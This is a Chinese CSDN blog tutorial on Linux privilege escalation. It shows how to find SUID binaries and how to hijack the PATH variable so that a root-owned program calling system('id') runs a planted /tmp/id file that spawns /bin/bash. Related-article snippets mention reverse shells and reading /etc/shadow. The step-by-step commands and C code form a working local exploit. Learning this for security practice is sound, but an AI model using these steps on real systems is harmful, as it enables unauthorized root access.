Linux提权之环境劫持

最新推荐文章于 2024-09-22 09:48:49 发布
最新推荐文章于 2024-09-22 09:48:49 发布
阅读量3.6k 收藏 2
点赞数
分类专栏: 提权篇 文章标签: 面试 web安全 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrx56/article/details/124069304
版权
本文探讨如何通过发现具有SUID权限的文件,利用system函数劫持环境变量,将/tmp目录置于优先级,从而创建并执行一个以root权限运行的bash shell。重点在于理解权限控制和环境变量的利用技巧。
摘要由CSDN通过智能技术生成

前提

  1. 具有SUID权限的文件–>所以会root权限运行
  2. 文件内容是以root权限执行的system命令–>system函数会继承环境变量,所以可以修改环境变量劫持,而以root运行才能达到提权目的
  3. 能本地创建文件–>一般/tmp目录任何用户都可以读写

流程

  1. 查看具有SUID权限的文件(必须是二进制文件)
find / -perm -u=s -type f 2>/dev/null
  1. 发现一个shell文件,cat发现是以root权限执行id命令,当无法查看文件内容时可使用xxd /shell | grep id命令来fuzz一下
#include <stdlib.h>
#include <unistd.h>
int main()
{
setuid(0);//run as root
system("id");
}
  1. 任意目录创建一个以id命名的文件文件(一般为tmp目录)
echo "/bin/bash" > id && chmod 777 id
cat id
/bin/bash

  1. 劫持环境变量
    echo $PATH //查看环境变量,发现以 :分割目录,且优先级从左往右
    /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
    export PATH=/tmp:$PATH // 将/tmp目录加在了最前面,所以执行命令时会优先去tmp目录中寻找,改为 . 表示将当前目录加入环境变量最前面

  2. 在回到刚刚的shell目录执行shell会发现得到了一个以root权限运行的bash。

mrx56
关注
专栏目录
操作系统权限提升(二十一)之Linux提权-环境变量劫持提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-01 940
假设管理员用户在/home目录下创建了一个demo.c文件,内容如下,执行查看shadow文件命令,setuid 规定了其运行用户,以root权限进行编译和权限设置。如果我们可以在环境变量中写入自己的环境变量,然后写一个自己的恶意命令,从而达到提权的目的。接下来用命令查找SUID文件,发现一个shell文件被配置了SUID。运行shell文件,发现是查看/etc/shadow的命令。可以看到目前我们的用户是一个普通用户daoer的权限。那么我们劫持cat命令,达到提权的目的。接下来就可以进行提权了。
LINUX提权环境变量提权
Jinmindong
12-14 328
今天给大家带来了环境变量提权比较简单的方法不知道大家听明白了没有,环境变量提权中比较重要的就是结合suid权限来展开,本文只是简单列举了其中的几个方法,因为本人也很少用这种方法,可能理解的不是很到位望大佬们指点,如果喜欢本文不妨一键三连支持一下。
环境变量劫持提权
最新发布
m0_68636078的博客
09-22 277
自用
Linux SUID 提权 & 劫持环境变量提权
布袋和尚
09-24 762
使用 cat 命令,因为 cat 命令被劫持成了 /bin/bash,就变成了 system("/bin/bash /etc/shadow),这个文件又是 SUID 文件以 root 权限执行,就直接切换至了 root 用户。SUID 是一种特殊的文件属性,它允许用户执行的文件已该文件的拥有者的身份运行,比如一个具有 SUID 属性的文件的拥有者是 root 用户,就可以 root 权限运行。在 linux 中的 /tmp(随便选的)目录创建一个名为 test.c 的文件,文件内容如下。
Linux环境变量劫持提权
Longwaer
01-02 3343
环境变量劫持提权: 本文通过查找SUID文件,劫持环境变量,从而使账号成功提权至root;本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。 ** 个人理解: 首先环境变量劫持提权的条件,就是系统中存在带有suid的文件,且这个 文件中必须有系统命令; 这样我们就可以命名一个和这个系统命令相同的文件,写入/bin
环境变量劫持
一只web狗
06-30 783
Linux提权
系统提权之:Unix 提权
f_carey的博客
08-28 967
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 系统提权之:Unix 提权1 Unix 内核漏洞提权1.1 利用前提1.2 利用 NC 建立 Shell 会话(便于操作)1.2.1 本地配置 NC 监听1.2.2 上传 perl-reverse-shell.pl 反弹 Shell1.3 查询 Unitx 系统内核信息1.4 查找内核版本对应的提权 EXP1..
系统提权之:Windows 提权
f_carey的博客
11-04 2799
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
105.网络安全渗透测试—[权限提升篇3]—[Linux劫持环境变量提权]
qwsn
02-15 4737
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、劫持环境变量提权 1、提权背景 2、提权原理 3、提权限制 3、提权测试 在tmp目录下建立一个文件cat,然后开启一个shell
内网提权:suid+劫持环境变量提权
自知.的博客
05-08 703
环境变量劫持提权的原理就是我们劫持了一个本身就具有SUID权限、root身份运行权限、可sudo的程序。不过普通用户没法修改root用户身份运行程序的环境变量,sudo需要知道当前用户密码,所以一般结合suid进行提权
linux提权环境劫持
weixin_45261436的博客
05-25 260
故,我们可以在 /tmp 下创建ps文件,里面使用 /bin/bash执行命令,把tmp的路径添加到当前环境路径,再访问 /script目录,执行shell文件,允许的时候便会首先会采用/tmp目录的ps文件作为命令 执行。将 /tmp 路径写入环境路径中,此时,执行shell命令,便会首先采用/tmp路径下的ps命令了。环境劫持需要的两个条件:存在带有suid的文件、suid文件存在系统命令。其中,/script/shell 中带有ps命令。这个二进制文件运行的时候一定是调用ps命令。
linux提权
温和的跳跃
01-25 333
我从docker逃匿->dirty cow->linux提权 。。。。。
Linux 命令被劫持了,怎么处理?看这里
Memory1011的博客
03-02 690
转自:http://www.pinlue.com/article/2021/03/0208/5711549730758.html
Linux 命令被劫持了,该怎么处理?
icontent
03-19 445
转自:http://www.pinlue.com/article/2021/03/0200/0011549730700.html
linux 进程 劫持,Linux 命令被劫持了,怎么处理
weixin_28993425的博客
04-30 674
本文转载自微信公众号「Bypass」,作者Bypass。转载本文请联系Bypass公众号。在一些应急场景中,我们经常会遇到有些木马会替换常用的系统命令进行伪装,即使我们清理了木马,执行ps、netstat等系统命令时又启动了木马进程。这种手法相对比较隐蔽,排查起来也比较困难,本文分享两种比较简单的排查技巧。1、AIDE 入侵检测AIDE 是一款入侵检测工具,主要用途是检查文档的完整性。通过构建一...
linux 攻击环境变量,【翻译】Linux环境变量提权
weixin_35216188的博客
05-04 277
本文我们会讲解关于Linux提权的几种方法,相信这些方法会对大家有所帮助。通过本文,我们将学习“控制$PATH环境变量的几种方法”来获取远程主机的root权限。开始吧!!!介绍$PATH是Linux和类Unix操作系统中的环境变量,它指定了存储所有可执行程序的bin和sbin目录。当用户在终端运行任何命令时,它向shell发出请求,在环境变量的帮助下搜索可执行文件以响应用户执行的命令。超级用户通常...
linux中利用环境变量PATH提权
weixin_49340699的博客
07-16 3642
linux中利用环境变量PATH提权实验环境准备 实验环境准备 准备一台kali模拟攻击者192.168.19.131 准备一台ubuntu模拟被攻击者IP:192.168.19.130 在ubuntu创建一个低权限用户user2 在kdu用户的工作目录下创建一个c程序调用系统命令cat gcc编译该c程序为文件shl ...
Linux环境DNS服务器配置指南
Linux环境中搭建DNS(域名系统)服务器是网络服务的重要组成部分,它负责将域名转换为IP地址,反之亦然。以下是一份详细的步骤指南: ### 步骤1:安装DNS相关包 在Linux上,我们通常使用BIND(Berkeley Internet...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值